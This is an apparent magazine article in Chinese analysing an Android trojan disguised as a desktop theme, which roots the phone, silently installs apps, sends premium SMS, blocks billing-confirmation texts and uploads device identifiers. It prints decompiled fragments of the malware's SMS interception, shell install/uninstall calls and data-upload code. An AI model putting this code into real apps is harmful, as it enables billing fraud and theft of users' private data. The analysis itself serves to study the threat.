Android木马分析与编写

Android 木马分析与编写

作者 mangel

一、 Android 木马介绍

Android 系统比iPhone 系统更开放，允许安装第三方应用程序，甚至是那些没有获得谷歌应用商店Android Market 批准的应用程序，但这种开放性似乎也增加了安全风险。Android Marke 本身也发现了恶意软件感染的应用程序，不过用户可以像在个人电脑上所做的那样，通过安装杀毒软件来加以防范。

二、 概述

该程序安装完是一款桌面主题，并可设置壁纸等。

运行后获取ROOT 权限，私自下载安装程序；并发送扣费短信，订制SP 服务，拦截掉回执的扣费确认短信，恶意消耗用户资费；窃取用户通讯录信息等隐私资料，并上传到服务器。

三、 样本特征

1. 敏感权限

黑

客防线 w w w .h a c k

e r .c o m .c

n

转载请注明出处

> android.setting.START_SEND_SMS android.setting.SMS_SENT

android.provider.Telephony.SMS_RECEIVED

2. 入口点和恶意模块

public class MyReceiver extends BroadcastReceiver{}

（1）.发送拦截短信：

String str39 = "android.setting.SMS_SENT"; try

{

String str41 = arrayOfSmsMessage[i13].getOriginatingAddress(); SmsManager localSmsManager4 = localSmsManager1; ArrayList localArrayList7 = localArrayList2;

localSmsManager4.sendMultipartTextMessage(str41, null, localArrayList5, localArrayList7, null); }

if (!paramIntent.getAction().equals("android.provider.Telephony.SMS_RECEIVED")) if ((arrayOfSmsMessage[i13].getOriginatingAddress().contains("10658166")) || (arrayOfSmsMessage[i13].getMessageBody().contains("83589523")) || (arrayOfSmsMessage[i13].getMessageBody().contains("客服")) || (arrayOfSmsMessage[i13].getMessageBody().contains("资费")) || (arrayOfSmsMessage[i13].getMessageBody().contains("1.00元")) || (arrayOfSmsMessage[i13].getMessageBody().contains("2.00元")) || (arrayOfSmsMessage[i13].getMessageBody().contains("元/条")) || (arrayOfSmsMessage[i13].getMessageBody().contains("元/次"))) abortBroadcast();

（2）. 获取ROOT 权限，安装卸载程序：

private void installApk(String paramString1, String paramString2)

try

{

Runtime localRuntime = Runtime.getRuntime();

StringBuilder localStringBuilder = new StringBuilder("sudo pm install -r ");

黑

客防线 w w w .h a c k

e r .c o m .c

n

转载请注明出处

File localFile2 = this.mContext.getFilesDir(); String str = localFile2 + "/" + paramString2; Process localProcess = localRuntime.exec(str); }

private void installAPK() private void uninstallPlugin() { try {

int i = Log.d("agui", "uninstall");

Process localProcess = Runtime.getRuntime().exec("pm uninstall -r com.newline.root"); Intent localIntent1 = new Intent("android.intent.action.RUN"); Context localContext = this.mContext;

Intent localIntent2 = localIntent1.setClass(localContext, MyService.class);

ComponentName localComponentName = this.mContext.startService(localIntent1); return;

}

（3）.窃取上传隐私资料：

String str8 = Long.toString(System.currentTimeMillis()); Object localObject1 = localHashtable.put("id", str8); Object localObject2 = localHashtable.put("imsi", str4); Object localObject3 = localHashtable.put("imei", str5); Object localObject4 = localHashtable.put("iccid", str6); Object localObject5 = localHashtable.put("mobile", str7);

String str9 = TimeUtil.dateToString(new Date(), "yyyyMMddHHmmss"); Object localObject6 = localHashtable.put("ctime", str9); Object localObject7 = localHashtable.put("osver", "1");

Object localObject8 = localHashtable.put("cver", "010101"); Object localObject9 = localHashtable.put("uid", str1); Object localObject10 = localHashtable.put("bid", str2); Object localObject11 = localHashtable.put("pid", str3);

Object localObject12 = localHashtable.put("softid", paramString2);

MessageService.4 local4 = new MessageService.4(this, paramIResponseListener); NetTask localNetTask = new NetTask(localHashtable, "utf-8", 0, local4); String[] arrayOfString = new String[1]; arrayOfString[0] = paramString1;

AsyncTask localAsyncTask = localNetTask.execute(arrayOfString);

public class NetTask extends AsyncTask protected String doInBackground(String[] paramArrayOfString) URL localURL1 = new java/net/URL;

String str5 = localStringBuffer1.toString();

黑

客防线 w w w .h a c k

e r .c o m .c

n

转载请注明出处